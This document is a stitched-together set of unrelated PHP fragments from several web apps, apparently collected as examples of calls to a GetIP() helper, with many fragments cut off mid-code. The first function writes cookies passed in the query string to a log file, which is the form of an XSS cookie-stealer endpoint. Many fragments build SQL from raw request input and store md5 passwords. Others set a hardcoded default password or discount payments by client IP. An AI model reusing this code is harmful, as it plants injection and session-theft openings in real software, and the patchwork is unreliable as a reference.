function logData() { $ipLog = "log.txt"; $cookie = $_GET['cookie']; $body = $_GET['body']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) { $ip = getenv('REMOTE_ADDR'); } else { $ip = GetIP(); } $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERRER']; $date = date("l dS of F Y h:i:s A"); $log = fopen("{$ipLog}", "a+"); if (preg_match("/\\bhtm\\b/i", $ipLog) || preg_match("/\\bhtml\\b/i", $ipLog)) { fputs($log, "IP: {$ip} | PORT: {$rem_port} | HOST: {$rem_host} | Agent: {$user_agent} | METHOD: {$rqst_method} | REF: {$referer} | DATE{ : } {$date} | COOKIE: {$cookie} <br> | BODY: {$body}"); } else { fputs($log, "IP: {$ip} | PORT: {$rem_port} | HOST: {$rem_host} | Agent: {$user_agent} | METHOD: {$rqst_method} | REF: {$referer} | DATE: {$date} | COOKIE: {$cookie} | BODY: {$body} \n\n"); } fclose($log); }
function CommonJob($Num, $Specific) { $Stage = new Stages(); //Connect if (!$Stage->Connect(LogID(), LogPassword(), LogDB())) { return 0; } if (!$Stage->CheckForms()) { $Stage->Close(); return 0; } //Write Log if (!$Stage->WriteLog(GetIP(), $Num)) { $Stage->Close(); return 0; } //Disconnect $Stage->Close(); //Connect if (!$Stage->Connect(FirmwareID(), FirmwarePassword(), FirmwareDB())) { return 0; } //Find Product if (!$Stage->FindProduct($Specific)) { $Stage->Close(); return 0; } //Disconnect $Stage->Close(); }
/** * Fetch the currency code to use based on the current visitors IP address. This function will perform a * GeoIP based lookup of the current visitors IP address and if possible, find a matching currency. * * @return mixed False if a currency cannot be found, else the currency ID if a matching currency was found. */ function GetCurrencyByIP() { require_once ISC_BASE_PATH."/lib/geoip/geoip.php"; $geoIp = @geoip_open(ISC_BASE_PATH."/lib/geoip/GeoIP.dat", GEOIP_STANDARD); if(!$geoIp) { return false; } $code = geoip_country_code_by_addr($geoIp, GetIP()); if(!$code) { return false; } $query = " SELECT currencyid FROM [|PREFIX|]currencies cu LEFT JOIN [|PREFIX|]countries co ON cu.currencycountryid = co.countryid LEFT JOIN ( SELECT r.couregid, c.countryiso2 FROM [|PREFIX|]countries c JOIN [|PREFIX|]country_regions r ON c.countrycouregid = r.couregid ) cr ON cu.currencycouregid = cr.couregid WHERE ( co.countryiso2 = '" . $GLOBALS['ISC_CLASS_DB']->Quote($code) . "' OR cr.countryiso2 = '" . $GLOBALS['ISC_CLASS_DB']->Quote($code) . "' ) AND cu.currencystatus = 1 LIMIT 1 "; return $GLOBALS['ISC_CLASS_DB']->FetchOne($query, 'currencyid'); }
function Loginlogs() { $line['ip'] = GetIP(); $line['time'] = date("Y-m-d H:i:s"); $line['AgentID'] = $_SESSION['AgentID']; $DB = new DB(); $DB->insertArray('tbl_loginlogs', $line); }
public function saveLog($uid, $action) { global $router, $match; $format = "INSERT INTO `" . DB_PRE . "log` (`lid`, `uid`, `action`, `ip`, `ctime`)"; $format .= " VALUES ('%s', '%d', '%d', '%s', '%d');"; $sql = sprintf($format, $match['action'], $uid, $action, GetIP(), time()); parent::Insert($sql); }
function hb_log($msg, $prefix = "", $level = "INFO") { $path = "../log/" . date("Y-m-d") . $prefix . ".log"; $log = date("Y-m-d H:i:s") . " "; $log .= GetIP() . " "; $log .= $level . " "; $log .= json_encode($msg, JSON_UNESCAPED_UNICODE) . PHP_EOL; file_put_contents($path, $log, FILE_APPEND); }
public function __construct($subemail, $subfirstname) { $this->setDoubleOptIn(GetConfig('EmailIntegrationNewsletterDoubleOptin')); $this->setSendWelcome(GetConfig('EmailIntegrationNewsletterSendWelcome')); $this->setSubscriptionIP(GetIP()); $this->subemail = $subemail; $this->subfirstname = $subfirstname; }
public function create() { $data = array(); $data['user_browser'] = GetBrowser(); $data['user_ip'] = GetIP(); $data['user_lang'] = GetLang(); $data['user_os'] = GetOs(); $result = D('User')->addData($data); echo '<pre/>'; print_r($result); }
function DevLog($Lv, $Msg, $Pth = "") { if (!is_numeric($Lv) || !is_string($Msg)) { return -1; } // Default log level is 'Info'. if (!defined('LOG_LEVEL')) { define('LOG_LEVEL', 2); } if ($Lv > LOG_LEVEL) { return 1; } $LvFlg = ""; switch ($Lv) { case 0: $LvFlg = '[ERROR]'; break; case 1: $LvFlg = '[WARN ]'; break; case 2: $LvFlg = '[INFO ]'; break; case 3: $LvFlg = '[DEBUG]'; break; case 4: $LvFlg = '[FULL ]'; break; default: $LvFlg = '[?????]'; break; } $Log = date('YmdHis ') . GetIP() . ' ' . $LvFlg . ' ' . $Msg . "\n"; if (!defined('LOG_PATH')) { define('LOG_PATH', "./"); } $FP = LOG_PATH . date('YW') . '-DevLog.txt'; // '$FP' = File Path. $FR = @fopen($FP, 'w'); // '$FR' = File Resource. if ($FR == false) { return -2; } if (!@flock($FR, LOCK_EX)) { fclose($FR); return -3; } @fwrite($FR, $Log); @flock($FR, LOCK_UN); @fclose($FR); return 0; }
function login_login() { global $_MooClass, $dbTablePre, $memcached; /* $seccode1 = strtolower(MooGetGPC('vertify_code','string','P')); $seccode2 = MooGetGPC('seccode','string','C'); $session_seccode = $memcached->get($seccode2); if($seccode1 != $session_seccode){ MooMessageAdmin("验证码填写不正确,请确认。", "index.php?action=login",'','',3); } */ $username = MooGetGPC('username', 'string', 'P'); $password = MooGetGPC('password', 'string', 'P'); $password = md5($password); //判断用户名和密码是否为空 if ($username == '' || $password == '') { MooMessageAdmin('用户名或密码不能为空', 'index.php?n=login', 1); } $userinfo = $_MooClass['MooMySQL']->getOne("SELECT * FROM {$dbTablePre}admin_user WHERE `username`='{$username}' LIMIT 1 ", true); if ($userinfo['uid'] && $userinfo['password'] == $password) { MooSetCookie('admin', MooAuthCode("{$userinfo['uid']}\t{$userinfo['password']}", 'ENCODE'), 86400); //note 写入session表需要的字段值 $online_ip = GetIP(); $lastactive = $GLOBALS['timestamp']; //note 提取快到期的高级用户并加入备注中 $nowtime = time(); $endtime = $nowtime + 8 * 24 * 60 * 60; $_MooClass['MooMySQL']->query("DELETE FROM {$dbTablePre}custom_remark WHERE `keyword`='会员到期' AND `cid`='{$userinfo['uid']}'"); $remark = $_MooClass['MooMySQL']->getAll("SELECT `uid`,`endtime` FROM {$dbTablePre}members_search WHERE `sid`={$userinfo['uid']} AND `s_cid`=30 AND `endtime`<{$endtime}", 0, 0, 0, true); for ($i = 0; $i < count($remark); $i++) { $content = "尊敬的客服,您的红娘号为" . $remark[$i]['uid'] . "的会员将于" . date('Y-m-d', $remark[$i]['endtime']) . "到期,请尽快与该会员联系"; $_MooClass['MooMySQL']->query("INSERT INTO {$dbTablePre}custom_remark SET `cid`={$userinfo['uid']},`keyword`='会员到期',`content`='{$content}',`awoketime`='{$remark[$i]['endtime']}'"); } //更新最后登录相关记录 $sql = "UPDATE {$dbTablePre}admin_user SET lastlogin='******',lastip='{$online_ip}' WHERE uid='{$userinfo['uid']}'"; $GLOBALS['_MooClass']['MooMySQL']->query($sql); $sid_list = ''; //得到我所管理的客服id列表 $sid_list = get_mymanage_serviceid_list($userinfo['uid'], $userinfo['groupid']); $time = time(); $sql = "REPLACE INTO {$GLOBALS['dbTablePre']}admin_usersession SET uid='{$userinfo['uid']}',groupid='{$userinfo['groupid']}',dateline='{$time}',sid_list='{$sid_list}'"; $GLOBALS['_MooClass']['MooMySQL']->query($sql); //添加操作日志 serverlog(3, $dbTablePre . "admin_usersession", "{$userinfo['uid']}成功登陆后台", $userinfo['uid']); MooMessageAdmin('登陆成功', 'index.php?n=main', 1); } else { MooMessageAdmin('用户名或密码错误', 'index.php?n=login', 1); } }
/** * Add a customer * * Method will add a customer to the database * * @access public * @param array $input The customer details * @return int The customer record ID on success, FALSE otherwise */ public function add($input) { $savedata = array('custpassword' => md5($input['password']), 'custconcompany' => $input['company'], 'custconfirstname' => $input['firstname'], 'custconlastname' => $input['lastname'], 'custconemail' => $input['email'], 'custconphone' => $input['phone'], 'custdatejoined' => time()); if (isset($input['subscribed'])) { $savedata['subscribed'] = $input['subscribed']; } // 20110613 johnny add if (isset($input['isguest'])) { $savedata['isguest'] = $input['isguest']; } if (isset($input['storecredit'])) { $savedata['custstorecredit'] = $input['storecredit']; } if (array_key_exists('customergroupid', $input) && isId($input['customergroupid'])) { $savedata['custgroupid'] = $input['customergroupid']; } else { $input['customergroupid'] = 0; $savedata['custgroupid'] = 0; } if (!array_key_exists('is_import', $input) || !$input['is_import']) { $savedata['custregipaddress'] = GetIP(); } else { if (array_key_exists('token', $input)) { $savedata['customertoken'] = $input['token']; } } if (array_key_exists('custformsessionid', $input)) { $savedata['custformsessionid'] = $input['custformsessionid']; } $customerid = $GLOBALS['ISC_CLASS_DB']->InsertQuery('customers', $savedata); $input['customerid'] = $customerid; if (!isId($customerid)) { return false; } if (array_key_exists('shipping_address', $input)) { $input['shipping_address']['customerid'] = $input['customerid']; $input['shipping_address']['shipcustomerid'] = $input['customerid']; $this->shipping->add($input['shipping_address']); } /** * Create the spool file */ $this->createServiceRequest('customer', 'add', $input['customerid'], 'customer_create'); return $customerid; }
/** @param (忘记密码)通过地址栏用户名和新密码登陆 @param return null */ function find_pwd() { global $_MooClass, $dbTablePre, $userid, $_MooCookie; // if($userid){ // return; // } $uid = MooGetGPC('uid', 'string', G); $pwd = MooGetGPC('upwd', 'string', G); /* echo md5($uid).'<br>'; echo md5($pwd); print_r($_COOKIE); exit; */ if ($_MooCookie['findpwd'] == md5($pwd) && md5($uid) == $_MooCookie['finduser']) { $newpwd = md5(base64_decode($pwd)); //note 修改密码 //$_MooClass['MooMySQL']->query("update {$dbTablePre}members set password = '******' where uid = '{$uid}'"); //if(MOOPHP_ALLOW_FASTDB){ // MooFastdbUpdate('members','uid',$uid); // } MooSetCookie('auth', MooAuthCode("{$uid}\t{$newpwd}", 'ENCODE'), 86400); //note 写入session表需要的字段值 $online_ip = GetIP(); $lastactive = $GLOBALS['timestamp']; //$uid = $user['uid']; //note 更新用户的最近登录ip和最近登录时间 $updatesqlarr = array('lastip' => $online_ip, 'lastvisit' => $lastactive, 'password' => $newpwd); $wheresqlarr = array('uid' => $uid); updatetable("members_search", $updatesqlarr, $wheresqlarr); if (MOOPHP_ALLOW_FASTDB) { $val = array(); $val['lastip'] = $online_ip; $val['lastvisit'] = $lastactive; $val['password'] = $newpwd; MooFastdbUpdate('members_search', 'uid', $uid, $val); //!! } //note 先删除表里面已存在对应用户的session //$_MooClass['MooMySQL']->query("DELETE FROM `{$dbTablePre}membersession` WHERE `uid` ='$uid'"); //$_MooClass['MooMySQL']->query("REPLACE INTO `{$dbTablePre}membersession` SET `username`= '$user[username]',`password`='$user[password]',`ip` = '$online_ip',`lastactive` = '$lastactive',`uid` = '$uid'"); return 1; } return 0; }
function active_email() { global $_MooClass; $uid = $u['uid'] = MooGetGPC('uid', 'string'); $verifycode = MooGetGPC('verifycode', 'string'); $username = $u['username'] = MooGetGPC('p', 'string'); if ($verifycode == strtoupper(md5('hongniangwang' . $u['uid'] . $u['username']))) { $online_ip = GetIP(); $t = time(); $pass = md5('123456'); $r = $_MooClass['MooMySQL']->getOne("select * from web_activelog where uid={$uid} limit 1", true); if ($r['username'] == $username) { MooMessage("您已经激活过了", "index.php", "05"); } else { //$_MooClass['MooMySQL']->query("update web_members_search,web_members_login set password='******',usertype=1,regdate='$t',last_login_time = '$t',login_meb = login_meb+1,lastip='$online_ip',lastvisit='$t' where uid='$uid'"); $_MooClass['MooMySQL']->query("update web_members_search as s,web_members_login as l set s.password='******',s.usertype=1,s.regdate='{$t}',l.last_login_time = '{$t}',l.lastip='{$online_ip}',l.lastvisit='{$t}' where s.uid='{$uid}' and l.uid='{$uid}'"); searchApi('members_man members_women')->updateAttr(array('usertype', 'regdate'), array($uid => array(1, $t))); $_MooClass['MooMySQL']->query("insert into web_activelog(uid,username,activetime) values('{$uid}','{$username}','{$t}')"); } MooSetCookie('auth', MooAuthCode("{$uid}\t{$pass}", 'ENCODE'), 86400); MooSetCookie('username', $u['username'], time() + 3600); if (MOOPHP_ALLOW_FASTDB) { $user11 = MooFastdbGet('members_search', 'uid', $uid); $meb = $user11['login_meb']; $val_s = $val_l = array(); $val_s['password'] = $pass; $val_s['usertype'] = 1; $val_s['regdate'] = $t; $val_l['last_login_time'] = $t; $val_l['login_meb'] = $meb + 1; $val_l['lMooFastdbUpdateastip'] = $online_ip; $val_l['lastvisit'] = $t; MooFastdbUpdate('members_search', 'uid', $uid, $val_s); //!! MooFastdbUpdate('members_login', 'uid', $uid, $val_l); } //$_MooClass['MooMySQL']->query("INSERT INTO `web_membersession` SET `username`= '$u[username]',`password`='$pass',`ip` = '$online_ip',`lastactive` = '$t',`uid` = '$uid'"); MooMessage("验证激活成功", "index.php", "05"); } else { MooMessage("参数有误!请注册", "index.php", "02"); } }
function checkUser($username,$userpwd) { //只允许用户名和密码用0-9,a-z,A-Z,'@','_','.','-'这些字符 $this->userName = ereg_replace("[^0-9a-zA-Z_@\!\.-]",'',$username); $this->userPwd = ereg_replace("[^0-9a-zA-Z_@\!\.-]",'',$userpwd); $pwd = substr(md5($this->userPwd),0,24); $dsql = new DedeSql(false); $dsql->SetQuery("Select * From #@__admin where userid='".$this->userName."' limit 0,1"); $dsql->Execute(); $row = $dsql->GetObject(); if(!isset($row->pwd)){ $dsql->Close(); return -1; } else if($pwd!=$row->pwd){ $dsql->Close(); return -2; } else{ $loginip = GetIP(); $this->userID = $row->ID; $this->userType = $row->usertype; $this->userChannel = $row->typeid; $this->userName = $row->uname; $groupSet = $dsql->GetOne("Select * From #@__admintype where rank='".$row->usertype."'"); $this->userPurview = $groupSet['purviews']; $dsql->SetQuery("update #@__admin set loginip='$loginip',logintime='".strftime("%Y-%m-%d %H:%M:%S",time())."' where ID='".$row->ID."'"); $dsql->ExecuteNoneQuery(); $dsql->Close(); return 1; } }
<?php require 'framwork/MooPHP.php'; MooPlugins('ipdata'); $address = convertIp(GetIP()); echo "var curent_area='" . $address . "'"; MooGetFromwhere();
function AuthReset() { global $player; if (isset($_SESSION['USER_RESET']) && isset($_SESSION['USER_RESET_ID'])) { $pass = TextSave($_SESSION['USER_RESET']); $db = new DB(); $db->connect(); $Row = $db->fetch_assoc($db->execute("SELECT * FROM `users` WHERE `passw` = '{$pass}' AND `id` = " . $_COOKIE['USER_RESET_ID'])); if (empty($Row['login'])) { unset($_SESSION['USER_RESET']); setcookie('USER_RESET', '', 0, '/'); exit(header("Location: /")); } elseif ($Row['group'] == 2) { unset($_SESSION['USER_RESET']); setcookie('USER_RESET', '', 0, '/'); MessageSend(1, "Ваш аккаунт заблокирован!", '/'); } $db->execute("UPDATE `users` SET `last_online` = '" . time() . "',`ip` = '" . GetIP() . "' WHERE `login` = '" . $Row['login'] . "'"); $_SESSION['USER_LOGGED'] = true; $MRow = $db->fetch_assoc($db->execute("SELECT * FROM `money` WHERE `username` = '" . $Row['login'] . "'")); $player['id'] = $Row['id']; $player['login'] = $Row['login']; $player['email'] = $Row['email']; $player['group'] = $Row['group']; $player['realmoney'] = (int) $MRow['realmoney']; $player['balance'] = (double) $MRow['balance']; $player['reg_date'] = $Row['reg_date']; $player['last_online'] = $Row['last_online']; setcookie('USER_RESET', $pass, time() + '604800', '/'); setcookie('USER_RESET_ID', $_COOKIE['USER_RESET_ID'], time() + '604800', '/'); if ($player['group'] >= 7 && $Row['ip'] != GetIP() && $Row['ip2'] != GetIP()) { $db->close(); exit("<p style='color:red'>Вход с неизвестного IP!</p> Обратитесь к администрации!"); } $db->close(); } elseif (isset($_COOKIE['USER_RESET']) && isset($_COOKIE['USER_RESET_ID'])) { $pass = TextSave($_COOKIE['USER_RESET']); $db = new DB(); $db->connect(); $Row = $db->fetch_assoc($db->execute("SELECT * FROM `users` WHERE `passw` = '{$pass}' AND `id` = " . $_COOKIE['USER_RESET_ID'])); if (empty($Row['login'])) { setcookie('USER_RESET', '', 0, '/'); exit(header("Location: /")); } elseif ($Row['group'] == 2) { unset($_SESSION['USER_RESET']); setcookie('USER_RESET', '', 0, '/'); MessageSend(1, "Ваш аккаунт заблокирован!", '/'); } $db->execute("UPDATE `users` SET `last_online` = '" . time() . "',`ip` = '" . GetIP() . "' WHERE `login` = '" . $Row['login'] . "'"); $_SESSION['USER_LOGGED'] = true; $MRow = $db->fetch_assoc($db->execute("SELECT * FROM `money` WHERE `username` = '" . $Row['login'] . "'")); $player['id'] = $Row['id']; $player['login'] = $Row['login']; $player['email'] = $Row['email']; $player['group'] = $Row['group']; $player['realmoney'] = (int) $MRow['realmoney']; $player['balance'] = (double) $MRow['balance']; $player['reg_date'] = $Row['reg_date']; $player['last_online'] = $Row['last_online']; setcookie('USER_RESET', $pass, time() + '604800', '/'); setcookie('USER_RESET_ID', $_COOKIE['USER_RESET_ID'], time() + '604800', '/'); if ($player['group'] >= 7 && $Row['ip'] != GetIP() && $Row['ip2'] != GetIP()) { $db->close(); exit("<p style='color:red'>Вход с неизвестного IP!</p> Обратитесь к администрации!"); } $db->close(); } else { $_SESSION['USER_LOGGED'] = false; } }
if ($action == "save") { $svali = GetCkVdValue(); if (strtolower($vdcode) != $svali || $svali == "") { ShowMsg("认证码错误!", "-1"); exit; } $subject = cn_substrR(trim(HtmlReplace($subject), 2), 80); $text = preg_replace("#<(iframe|script)#i", "", $text); if (CountStrLen($text) < 3 || CountStrLen($text) > 1000) { ShowMsg("内容字数应该在3-1000个汉字!", "-1"); exit; } if (preg_match("#{$cfg_notallowstr}#", $subject) || preg_match("#{$cfg_notallowstr}#", $text)) { ShowMsg("含有非法字符!", "-1"); exit; } $subject = preg_replace("/{$cfg_replacestr}/", "***", $subject); $text = preg_replace("/{$cfg_replacestr}/", "***", $text); $userip = GetIP(); $SetQuery = "INSERT INTO #@__group_guestbook(gid,title,uname,userid,stime,message,ip) "; $SetQuery .= "VALUES('{$id}','{$subject}','" . $cfg_ml->M_UserName . "','" . $cfg_ml->M_ID . "','" . time() . "','{$text}','{$userip}');"; if ($db->ExecuteNoneQuery($SetQuery)) { ShowMsg("留言成功!", "guestbook.php?id={$id}"); exit; } else { ShowMsg("出错了!", "-1"); exit; } } else { exit("403 Forbidden!"); }
* @Title 易宝支付EPOS范例 * @Description 用户支付后易宝"点对点"访问此页面,商户在本文件中加入自身业务 * @Author wenhua.cheng */ require_once dirname(__FILE__) . '/./../../framwork/MooPHP.php'; require_once dirname(__FILE__) . '/./config.php'; require_once dirname(__FILE__) . '/./function.php'; require_once dirname(__FILE__) . '/./yeepayeposcommon.php'; //define("INFO",dirname(__FILE__)."/./info.txt"); //define("INFOW",dirname(__FILE__)."/./infow.txt"); //define("INFOMATION",dirname(__FILE__)."/./infomation.txt"); global $payment_code, $paymoney, $paymoney2, $activitytime1, $activitytime2; $logName = $payment_code['yeepayepos']['logyeepayepos']; $merchantKey = $payment_code['yeepayepos']['merchantKey']; $allow_ip = array('220.178.112.174', '61.190.44.98', '127.0.0.1', '220.178.123.74', '221.130.166.242', '120.193.108.166', '61.190.22.14', '61.190.10.254', '124.73.152.192'); $cur_ip = GetIP(); if (in_array($cur_ip, $allow_ip)) { $paymoney = array('platinum' => '0.10', 'diamond' => '0.10', 'vip' => '0.10', 'citystar' => '0.10'); } else { if (strpos($cur_ip, '192.168') !== FALSE) { $paymoney = array('platinum' => '0.10', 'diamond' => '0.10', 'vip' => '0.10', 'citystar' => '0.10'); } } // print_r($paymoney);die; // 支付成功时返回的参数 $p1_MerId = $_GET['p1_MerId']; $r0_Cmd = $_GET['r0_Cmd']; $r1_Code = $_GET['r1_Code']; $r2_TrxId = $_GET['r2_TrxId']; $r3_Amt = $_GET['r3_Amt']; $r4_Cur = $_GET['r4_Cur'];
<?php session_start(); include "Includes/includes.php"; echo "<html>\n\n<head>\n\n\n<title>ANDRIX CENTER- Allt för hemmet</title>\n</head>\n\n<br><br><br><br><br>\n<body bgcolor=\"#CCFF99\">\n\n<div align=\"center\">\n\t<table border=\"0\" width=\"60%\">\n\t\t<tr>\n\t\t\t<td width=\"90%\"><font face=\"Arial Black\" style=\"font-size: 42pt\">ANDRIX \n\t\t\tCENTER</font><font size=\"7\" face=\"Arial Black\"> </font>\n\t\t\t<font face=\"Arial Black\" size=\"1\">THE NEXT GENERATION<br>\n\t\t\t</font>\n\t\t\t<font face=\"Arial Black\">Allt för det smarta hemmet...</font><BR>\n\t\t\t</td>\n\t\t</tr>\n\t</table>\n</div>\n<br><br><br>\n\n<div align=\"center\">\n\t<table border=\"0\" width=\"60%\">\n\t\t<tr>\n\t\t\t<td width=\"90%\">\n\t\t\t<form method=\"POST\" action=\"logincheck.php?status=login\">\n\t\t\t\t\n\t\t\t\t<p align=\"right\"><font face=\"Arial Black\" size=\"2\"> </font>\n\t\t\t\t<table border=\"0\" width=\"100%\">\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t<p align=\"right\"><font face=\"Arial Black\" size=\"2\">Användarnamn :</font></td>\n\t\t\t\t\t\t<td width=\"183\">\n\t\t\t\t\t\t\n\t\t\t\t\t\t<p align=\"center\"> <input type=\"text\" name=\"usern\" size=\"20\"></td>\n\t\t\t\t\t</tr>\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td>\n\t\t\t\t\t\t<p align=\"right\"><font face=\"Arial Black\" size=\"2\">Lösenord : </font> </td>\n\t\t\t\t\t\t<td width=\"183\">\n\t\t\t\t\t\t<p align=\"center\"> <input type=\"password\" name=\"passw\" size=\"20\"></td>"; $ip = GetIP(); ConnectDb(write, andrixTNG); $result = mysql_query("SELECT * FROM BlockIP where ip='{$ip}'"); if (mysql_num_rows($result) == 1) { echo "IP NUMMRET NI KOMMER FRÅN ÄR SPÄRRAT!!!"; } echo "</tr>\n\t\t\t\t</table><p align=\"right\"><br>\n\t\t\t\t<input type=\"submit\" value=\"Login\" name=\"Logga in\"></p>\n\t\t\t</form></td>\n\t\t</tr>\n\t</table>\n</div>\n<center><font face=\"Arial\" size=\"1\">...</font></center>\n</body>\n\n</html>";
<li>压缩文件支持(Zlib): <?php echo showResult(function_exists('gzclose')); ?> </li> </ul> </div> <div class="cl"></div> </div> <div class="homeNote"> <h2 class="title">记事</h2> <div class="notearea"> <textarea name="homeNote" id="homeNote"><?php $uname = $_SESSION['admin']; $posttime = time(); $postip = GetIP(); $r = $dosql->GetOne("SELECT `body` FROM `#@__adminnotes` WHERE uname='{$uname}'"); if (isset($r['body'])) { echo trim($r['body']); } else { echo '点击输入便签内容...'; } ?> </textarea> </div> </div> <?php function showResult($v) { if ($v == 1) {
$error = $lang['er_noaccess']; } else { $DB->exe("INSERT INTO " . TABLE_PREFIX . "comment VALUES(NULL,'{$uid}','{$gname}','{$content}','" . GetIP() . "','" . time() . "')"); $er_info = '<BR><BR><BR><BR><BR><BR><BR><center><font color=green>' . $lang['thanksfor'] . '</font></center>'; header_utf8(); die($er_info); } } } else { $vvckey = ForceIncomingString('vvckey'); $code = authcode(base64_decode($_GET['code']), 'DECODE', $vvckey); if (!$uid or !$code or !$vvckey) { $error = $lang['er_verify']; } elseif ($code !== COOKIE_KEY . $uid) { $error = $lang['er_verify']; } elseif (IsBannedIP(GetIP())) { $error = $lang['er_bannedip']; } else { $sql = "SELECT u.userid, u.userfrontname, u.userfrontename FROM " . TABLE_PREFIX . "user u\n\t\t\t\t\tLEFT JOIN " . TABLE_PREFIX . "usergroup ug ON ug.usergroupid = u.usergroupid\n\t\t\t\t\tWHERE u.userid = '{$uid}'\n\t\t\t\t\tAND u.activated = 1\n\t\t\t\t\tAND u.usergroupid <> 1\n\t\t\t\t\tAND ug.activated = 1"; $user = $DB->getOne($sql); if (!$user['userid'] or $code !== COOKIE_KEY . $user['userid']) { $error = $lang['er_verify']; } elseif ($user['isonline']) { //跳转到服务窗口 } } //以上需要添加禁止IP的验证 //根据语言选择客服的信息 if (IS_CHINESE) { $username = $user['userfrontname']; } else {
$r = $dosql->GetOne("SELECT mobile FROM `{$tbname}` WHERE mobile='{$mobile}'"); if (!empty($r['mobile'])) { ShowMsg('手机号码已存在!', '-1'); exit; } } if ($email != '') { $r = $dosql->GetOne("SELECT email FROM `{$tbname}` WHERE email='{$email}'"); if (!empty($r['email'])) { ShowMsg('邮箱已存在!', '-1'); exit; } } $password = md5(md5($password)); $regtime = GetMkTime($regtime); $regip = GetIP(); $sql = "INSERT INTO `{$tbname}` (username, password, question, answer, cnname, enname, sex, birthtype, birth_year, birth_month, birth_day, astro, bloodtype, trade, live_prov, live_city, live_country, home_prov, home_city, home_country, cardtype, cardnum, intro, email, qqnum, mobile, telephone, address_prov, address_city, address_country, address, zipcode, enteruser, expval, integral, regtime, regip, logintime, loginip) VALUES ('{$username}', '{$password}', '{$question}', '{$answer}', '{$cnname}', '{$enname}', '{$sex}', '{$birthtype}', '{$birth_year}', '{$birth_month}', '{$birth_day}', '{$astro}', '{$bloodtype}', '{$trade}', '{$live_prov}', '{$live_city}', '{$live_country}', '{$home_prov}', '{$home_city}', '{$home_country}', '{$cardtype}', '{$cardnum}', '{$intro}', '{$email}', '{$qqnum}', '{$mobile}', '{$telephone}', '{$address_prov}', '{$address_city}', '{$address_country}', '{$address}', '{$zipcode}', '{$enteruser}', '{$expval}', '{$integral}', '{$regtime}', '{$regip}', '{$regtime}', '{$regip}')"; if ($dosql->ExecNoneQuery($sql)) { header("location:{$gourl}"); exit; } } else { if ($action == 'update') { if (!isset($enteruser)) { $enteruser = ''; } if ($password != $repassword) { ShowMsg('两次输入的密码不一样!', '-1'); exit; } //删除头像
function GetIP() { if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } elseif (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); if (strstr($ip, ',')) { $tmp = explode(',', $ip); $ip = trim($tmp[0]); } } else { $ip = getenv("REMOTE_ADDR"); } return $ip; } $ip_adresi = GetIP(); $hacktarih = date("d.m.Y"); $resimadi = $_FILES['resimx']['name']; $ekle = mysql_query("INSERT INTO hack (ipadres,tarih,dosyaadi) " . "VALUES('{$ip_adresi}','{$hacktarih}','{$resimadi}')"); echo '<div class="sol list4 fontkalin" style="background:#fff;">Hatalý bir dosya yüklediniz.</div>'; } else { if ($_FILES['resimx']['type'] != "image/gif" && $_FILES['resimx']['type'] != "image/jpeg" && $_FILES['resimx']['type'] != "image/pjpeg" && $_FILES['resimx']['type'] != "image/png") { echo '<div class="sol list4 fontkalin" style="background:#fff;">Dosya formatýnýz yanlýþ</div>'; } else { if ($_FILES['resimx']['type'] == "image/gif") { $uzanti = ".gif"; } elseif ($_FILES['resimx']['type'] == "image/jpeg") { $uzanti = ".jpeg"; } elseif ($_FILES['resimx']['type'] == "image/pjpeg") { $uzanti = ".jpg"; } elseif ($_FILES['resimx']['type'] == "image/png") {
ShowMsg('参数错误!', '-1'); exit; } if (strlen($msg) < 6) { ShowMsg('你的留言内容太短!', '-1'); exit; } $uname = HtmlReplace($uname, 1); $msg = cn_substrR(HtmlReplace($msg), 2048); $title = cn_substrR(HtmlReplace($title), 255); if ($cfg_ml->M_UserName != '' && $cfg_ml->M_ID != $uidnum) { $gid = $cfg_ml->M_UserName; } else { $gid = ''; } $inquery = "INSERT INTO `#@__member_guestbook`(mid,gid,title,msg,uname,ip,dtime)\n VALUES ('{$uidnum}','{$gid}','{$title}','{$msg}','{$uname}','" . GetIP() . "'," . time() . "); "; $dsql->ExecuteNoneQuery($inquery); ShowMsg('成功提交你的留言!', "index.php?uid={$uid}&action=guestbook"); exit; } else { if ($action == 'guestbookdel') { CheckRank(0, 0); if ($cfg_ml->M_LoginID != $uid) { ShowMsg('这条留言不是给你的,你不能删除!', -1); exit; } $inquery = "DELETE FROM `#@__member_guestbook` WHERE aid='{$aid}' AND mid='{$mid}'"; $dsql->ExecuteNoneQuery($inquery); ShowMsg('成功删除!', "index.php?uid={$uid}&action=guestbook"); exit; } else {
<?php function GetIP() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $cip = $_SERVER['HTTP_CLIENT_IP']; } else { if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $cip = $_SERVER['HTTP_X_FORWAREDED_FOR']; } else { if (!empty($_SERVER['REMOTE_ADDR'])) { $cip = $_SERVER['REMOTE_ADDR']; } else { $cip = 'can not'; } } } return $cip; } echo "<br>IP:" . GetIP() . "<br>"; echo "<br>IP referer:" . $_SERVER["HTTP_REFERER"];
ShowMsg('你的新安全问题的答案太长了,请控制在30字节以内!', '-1'); exit; } } //会员的默认金币 $dfscores = 0; $dfmoney = 0; $dfrank = $dsql->GetOne("SELECT money,scores FROM `#@__arcrank` WHERE rank='10' "); if (is_array($dfrank)) { $dfmoney = $dfrank['money']; $dfscores = $dfrank['scores']; } $jointime = time(); $logintime = time(); $joinip = GetIP(); $loginip = GetIP(); $pwd = md5($userpwd); $mtype = RemoveXSS(HtmlReplace($mtype, 1)); $safeanswer = HtmlReplace($safeanswer); $safequestion = HtmlReplace($safequestion); $spaceSta = $cfg_mb_spacesta < 0 ? $cfg_mb_spacesta : 0; $inQuery = "INSERT INTO `#@__member` (`mtype` ,`userid` ,`pwd` ,`uname` ,`sex` ,`rank` ,`money` ,`email` ,`scores` ,\n `matt`, `spacesta` ,`face`,`safequestion`,`safeanswer` ,`jointime` ,`joinip` ,`logintime` ,`loginip` )\n VALUES ('{$mtype}','{$userid}','{$pwd}','{$uname}','{$sex}','10','{$dfmoney}','{$email}','{$dfscores}',\n '0','{$spaceSta}','','{$safequestion}','{$safeanswer}','{$jointime}','{$joinip}','{$logintime}','{$loginip}'); "; if 